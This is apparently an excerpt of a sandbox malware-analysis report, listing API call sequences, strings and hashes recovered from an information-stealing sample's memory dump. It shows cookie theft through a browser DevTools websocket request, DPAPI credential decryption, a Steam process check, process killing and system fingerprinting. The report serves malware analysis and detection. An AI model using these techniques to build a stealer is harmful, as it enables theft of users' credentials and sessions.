                            • Instruction Fuzzy Hash: ABA209F3A0C6049FE3046E2DEC85A7ABBE9EF94720F16893DE6C4C3744E63558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                            • API String ID: 909987262-758292691
                            • Opcode ID: 18957a646e625acf9018134d626dea6f1efd47a91871096a88d474b232b673c2
                            • Instruction ID: 6e697d7da17ed3359726f50e9c881541cba73f49e2cedd5eb13c03e8abed743a
                            • Opcode Fuzzy Hash: 18957a646e625acf9018134d626dea6f1efd47a91871096a88d474b232b673c2
                            • Instruction Fuzzy Hash: 2EA28A71D012599FDB10CFA8C8507EDBBB2BF89305F1481AAE908A7342DB795E89CF54
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004423D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004423F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00442402
                            • lstrlen.KERNEL32(\*.*), ref: 0044240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00442436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00442486
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: 7357d000cf1cade2d2fa2c53cfdea4b38cc9f9fd168826881a2c81befe26cb81
                            • Instruction ID: 9aa1bcfe12444929c69ba45c46f831c425bd036e4cc97b1f6fe32a08ba09938e
                            • Opcode Fuzzy Hash: 7357d000cf1cade2d2fa2c53cfdea4b38cc9f9fd168826881a2c81befe26cb81
                            • Instruction Fuzzy Hash: 424193317103058BDB31FF65DE85B9F73B9AF18308F40612AF84997212CBB89C019B98
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004546B9
                            • Process32First.KERNEL32(00000000,00000128), ref: 004546C9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 004546DB
                            • StrCmpCA.SHLWAPI(?,?), ref: 004546ED
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00454702
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00454711
                            • CloseHandle.KERNEL32(00000000), ref: 00454718
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00454726
                            • CloseHandle.KERNEL32(00000000), ref: 00454731
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: d9ecc4ac324f6e7f609c4db14a9eba4406e947378a3a61c341560ed928980982
                            • Instruction ID: 437248d726810d848f0ed7ece8a2dac3091fcb443032e3b8104f6840c5f11bdf
                            • Opcode Fuzzy Hash: d9ecc4ac324f6e7f609c4db14a9eba4406e947378a3a61c341560ed928980982
                            • Instruction Fuzzy Hash: B101AD31601124ABE7205B70EC88FFB377DAB89B46F001199FD05D6281EFB899888A74
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00454628
                            • Process32First.KERNEL32(00000000,00000128), ref: 00454638
                            • Process32Next.KERNEL32(00000000,00000128), ref: 0045464A
                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00454660
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00454672
                            • CloseHandle.KERNEL32(00000000), ref: 0045467D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                            • String ID: steam.exe
                            • API String ID: 2284531361-2826358650
                            • Opcode ID: bfe097e44e437a4b8dcd6b9d59a2a95129fa247e8dc77abc0098806331e2572d
                            • Instruction ID: cc760b4b3c846461eeb18a07b2b51f71bce8d4f0cfd00a9d566cef9bbb5847e4
                            • Opcode Fuzzy Hash: bfe097e44e437a4b8dcd6b9d59a2a95129fa247e8dc77abc0098806331e2572d
                            • Instruction Fuzzy Hash: AF01A2716011249BD7209B70AC48FEB77BDEF49351F0001DAED08D2141EFB8C9988BE5
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00444B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00444B7F
                            • lstrlen.KERNEL32(00464CA8), ref: 00444B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444BA7
                            • lstrcat.KERNEL32(00000000,00464CA8), ref: 00444BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00444BFA
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID:
                            • API String ID: 2567437900-0
                            • Opcode ID: 30ede07c28db9bdc9fb843f820cc702e0e26162dd995e6f91510563bbdcc5e7a
                            • Instruction ID: b98f4717970cea0baaa71a2d1fc599c205a5c47a84646113fe91a34bbfe65f73
                            • Opcode Fuzzy Hash: 30ede07c28db9bdc9fb843f820cc702e0e26162dd995e6f91510563bbdcc5e7a
                            • Instruction Fuzzy Hash: A23185316116559BDB22FF25ED85F9F77B9EF84318F10212AF80597251CBB8EC018BA8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: #y'm$#y'm$:{d$Hx$Y?_$h@;$j7^$F^_
                            • API String ID: 0-1801948742
                            • Opcode ID: 4e1d936857cb3a961aa0e460ed3915852fdd5286cc62cb0e4c5b162089be19f4
                            • Instruction ID: 33c9726e412e3b9ac3d40940b07fdb904010c492f56d6687a1a1fcff5c1102c6
                            • Opcode Fuzzy Hash: 4e1d936857cb3a961aa0e460ed3915852fdd5286cc62cb0e4c5b162089be19f4
                            • Instruction Fuzzy Hash: E5B208F360C2049FE704AE2DEC85A7AFBE9EF94720F16453DEAC4C3744EA3558058696
                            APIs
                              • Part of subcall function 004571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004571FE
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00452D9B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00452DAD
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00452DBA
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00452DEC
                            • LocalFree.KERNEL32(00000000), ref: 00452FCA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /iy=$?4U}$hW.s$pZON$tV}Z$yE$Xgn
                            • API String ID: 0-3159013932
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: " w$7?Vv$9_6$>cL$?K^$P6=$Rcs
                            • API String ID: 0-2655604428
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0U_m$jGv~$m4}$pqs$F)0$}}m
                            • API String ID: 0-671250135
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ^]$D9;$k\{W$p:2$nSS$o
                            • API String ID: 0-1032110692
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00452C42
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00452C49
                            • GetTimeZoneInformation.KERNEL32(?), ref: 00452C58
                            • wsprintfA.USER32 ref: 00452C83
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID: wwww
                            • API String ID: 3317088062-671953474
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Et{+$Kq_~$dq>$nto$nto
                            • API String ID: 0-1551151224
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 'K|$.(N_$:u{b$@wwi$JoR{
                            • API String ID: 0-1382821898
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0043775E
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00437765
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0043778D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004377AD
                            • LocalFree.KERNEL32(?), ref: 004377B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 77g$Y|<$Qk$$]
                            • API String ID: 0-2330177650
                            • Opcode ID: b211a63fd50a57627eec5df5badce27b11b681f2e1abc91822341fe108710aac
                            • Instruction ID: 192f6ae27cb8a87be253c81d3889346a9b9d611161c3bff8b42628958af7b61e
                            • Opcode Fuzzy Hash: b211a63fd50a57627eec5df5badce27b11b681f2e1abc91822341fe108710aac
                            • Instruction Fuzzy Hash: 12B2E5F3A0C2049FE304AE29EC8567AB7E5EF94320F1A493DEAC5C3744EA3558158697
                            APIs
                              • Part of subcall function 004571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004571FE
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00453A96
                            • Process32First.KERNEL32(00000000,00000128), ref: 00453AA9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00453ABF
                              • Part of subcall function 00457310: lstrlen.KERNEL32(------,00435BEB), ref: 0045731B
                              • Part of subcall function 00457310: lstrcpy.KERNEL32(00000000), ref: 0045733F
                              • Part of subcall function 00457310: lstrcat.KERNEL32(?,------), ref: 00457349
                              • Part of subcall function 00457280: lstrcpy.KERNEL32(00000000), ref: 004572AE
                            • CloseHandle.KERNEL32(00000000), ref: 00453BF7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 66f3177b3faf61085d93dad02ba030a92ecd4505a0ed3ea7570a450d24f5f775
                            • Instruction ID: d394cb488db35894b1fc88b60a4c41c02f344d63f8323cd12e90783a6c07d9b1
                            • Opcode Fuzzy Hash: 66f3177b3faf61085d93dad02ba030a92ecd4505a0ed3ea7570a450d24f5f775
                            • Instruction Fuzzy Hash: 2B810831900204CFC715CF19D848B96B7B5FB4535AF29C1AED8089B3A3D77AAD8ACB54
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0043EA76
                            • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0043EA7E
                            • lstrcat.KERNEL32(0045CFEC,0045CFEC), ref: 0043EB27
                            • lstrcat.KERNEL32(0045CFEC,0045CFEC), ref: 0043EB49
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 83be01ea49187628f745939c1f30efb19c80129455c3afe7ee0616e92a32378f
                            • Instruction ID: 1d4a18adeb7e19638e5d5fed8b55d55a776b5e0057b80c22ec938de8f2bf1b6c
                            • Opcode Fuzzy Hash: 83be01ea49187628f745939c1f30efb19c80129455c3afe7ee0616e92a32378f
                            • Instruction Fuzzy Hash: 8131E476A00218ABDB10CB58EC45FEFB77EDB44705F00416AFD09E3281DBB55A088BA5
                            APIs
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004540CD
                            • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004540DC
                            • RtlAllocateHeap.NTDLL(00000000), ref: 004540E3
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00454113
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcess
                            • String ID:
                            • API String ID: 3825993179-0
                            • Opcode ID: 359bed91a60ab89599370cb552ef05a7f68d65992286bca3d297e82372d112a4
                            • Instruction ID: 8ce03ef81b919c84fab92d492ddedfd5dc67fa59a586db7ee23fbb7076cb63ea
                            • Opcode Fuzzy Hash: 359bed91a60ab89599370cb552ef05a7f68d65992286bca3d297e82372d112a4
                            • Instruction Fuzzy Hash: 52011E70600205BBDB109FA5EC45B6BBBAEEF85715F108159FD0987340DA719940CB64
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0045A3D0,000000FF), ref: 00452B8F
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00452B96
                            • GetLocalTime.KERNEL32(?,?,00000000,0045A3D0,000000FF), ref: 00452BA2
                            • wsprintfA.USER32 ref: 00452BCE
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 3b9c849755658afb15288238948e2c792278ecdc303b80a29047a3f7a67fcd34
                            • Instruction ID: 009b9f58223028839c640a558307fb0b5b08a10623ce40a3df0cc17ce0945859
                            • Opcode Fuzzy Hash: 3b9c849755658afb15288238948e2c792278ecdc303b80a29047a3f7a67fcd34
                            • Instruction Fuzzy Hash: 600140B2904128ABCB149BD9DD45FBEB7BDFB4CB11F00021AFA05A2290E7B85840C7B5
                            APIs
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00439B3B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00439B4A
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00439B61
                            • LocalFree.KERNEL32 ref: 00439B70
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            • Opcode ID: e78c0b603b84c466e8be6472cfcf917b98e48be133f153c459ecfa9772685a37
                            • Instruction ID: 5bc86214ec94dd7df9abe04dfbed7feea50c61fac461a8b66c4b3ff024032c1a
                            • Opcode Fuzzy Hash: e78c0b603b84c466e8be6472cfcf917b98e48be133f153c459ecfa9772685a37
